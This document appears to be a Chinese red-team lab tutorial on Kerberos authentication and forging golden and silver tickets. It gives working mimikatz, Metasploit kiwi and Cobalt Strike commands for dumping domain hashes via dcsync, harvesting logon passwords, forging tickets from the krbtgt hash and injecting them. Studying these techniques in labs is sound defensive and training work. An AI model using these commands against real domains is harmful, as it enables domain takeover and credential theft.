内网渗透|Kerberos认证和黄金票据

littlebird

​
Kerberos认证介绍Kerberos是一种计算机网络授权协议，用来在非安全网络中，对个人通信以安全的手段进行身份认证。
这个词又指麻省理工学院为这个协议开发的一套计算机软件。
认证流程提示：
AS（Authentication Server） 认证服务器
KDC（Key Distribution Center） 密钥分发中心
TGT（Ticket Granting Ticket） 票据授权票据（票据的票据）
TGS（Ticket Granting Server） 票据授权服务器
ACL（Access Control Lists） 访问控制列表
DC（Domain Controller） 域控制器
AD（Active Directory） 活动目录
Client 客户端
Server 服务端
详细流程图

​

编辑
黄金票据原理在Kerberos认证中,Client通过AS(身份认证服务)认证后,AS会给Client一个 Logon Session Key和TGT,而Logon Session Key并不会保存在KDC中，krbtgt的NTLM Hash又是固定的,所以只要得到krbtgt的NTLM Hash，就可以伪造TGT和Logon Session Key来进入下一步Client与TGS的交互。而已有了金票后,就跳过AS验证,不用验证账户和密码,所以也不担心域管密码修改。
票据条件：

•         域名称
  
•         域的 SID 值
  
•         域的 KRBTGT 账号的 HASH
  
•         伪造D的任意用户名
  
  

实验环境机器：
12server4
AD01

域名：
redteam.club
Mimikatz12server4上操作
信息收集前提域管权限

1. #导出hash
   
2. privilege::debug
   
3. lsadump::dcsync /domain:redteam.club /all /csv（lsadump::lsa /inject）
   
4. ##一条命令
   
5. mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:redteam.club /all /csv" "exit">hash.txt

复制代码

​

​

编辑

​

编辑

​

编辑

制作​

1. #制作黄金票据
   
2. mimikatz.exe "kerberos::golden /admin:system /domain:redteam.club /sid:S-1-5-21-2536581826-3274276096-3456299113 /krbtgt:689fe33346a9e9fe229395fb36178ecb /ticket:ticket.kirbi" exit

复制代码

​

​

编辑
导入
​

1. #清除票据
   
2. kerberos::purge
   
3. #导入票据
   
4. kerberos::ptt C:\Users\ticket.kirbi

复制代码

​

​

编辑
Metasploit12server4上操作
system权限信息收集
​

1. #信息收集
   
2. load kiwi   #导入kiwi模块
   
3. 
   
4. ##提示：以下需要system权限
   
5. creds_all    #列举所有凭据
   
6. creds_kerberos  #列举所有kerberos凭据
   
7. kiwi_cmd sekurlsa::logonpasswords  #抓密码和hash

复制代码

​

​

编辑

​

编辑

​

编辑
域管权限信息收集
​

1. #信息收集（需要域管权限）
   
2. kiwi_cmd "lsadump::dcsync /domain:redteam.club /user:krbtgt"  #krbtgt账户的密码hash值
   
3. kerberos_ticket_list  #列举kerberos票据
   
4. kerberos_ticket_purge  #清除kerberos票据

复制代码

​

​

编辑

​

编辑
制作及导入​

1. #制作金票
   
2. golden_ticket_create -d redteam.club -k 689fe33346a9e9fe229395fb36178ecb -u administrator -s S-1-5-21-2536581826-3274276096-3456299113 -t /home/kali/administrator.ticket
   
3. #导入金票
   
4. kerberos_ticket_use /home/kali/administrator.ticket

复制代码

​

​

编辑
CobaltStrikeAD01上操作
注意在使用CobaltStrike4.7时，只有在AD上才能抓取到krbtgt的hash，二前两个有域管权限就可以
希望可以得到师傅们的指点
12server4：12server4\administrator和redteam\administrator均不成功

​

编辑

​

编辑
AD01：redteam\administrator成功抓取

​

编辑
流程1.抓取hash

​

编辑

​

编辑
2.shell whoami /all

​

编辑
3.制作金票

​

编辑

​

编辑

​

编辑
白银票据原理白银票据就是伪造的ST。在Kerberos认证的第三部，Client带着ST和Authenticator3向Server上的某个服务进行请求，Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问server上的指定服务了。所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用。
票据条件：

•         域名
  
•         域 SID（就是域成员SID值去掉最后的）
  
•         目标服务器的 FQDN
  
•         可利用的服务
  
•         服务账号的 NTLM Hash
  
•         需要伪造的用户名
  
  

​

编辑
这里就制作一个
mimikatz12server4上操作
​

1. mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> password.txt

复制代码

cifs

1. #命令格式
   
2. kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLMHash> /user:<伪造的用户名> /ptt
   
3. #示例
   
4. kerberos::golden /domain/target:OWA2010CN-God.god.org /rc4:689fe33346a9e9fe229395fb36178ecb  /service:cifs /user:admin /ptt

复制代码

​

​

编辑
​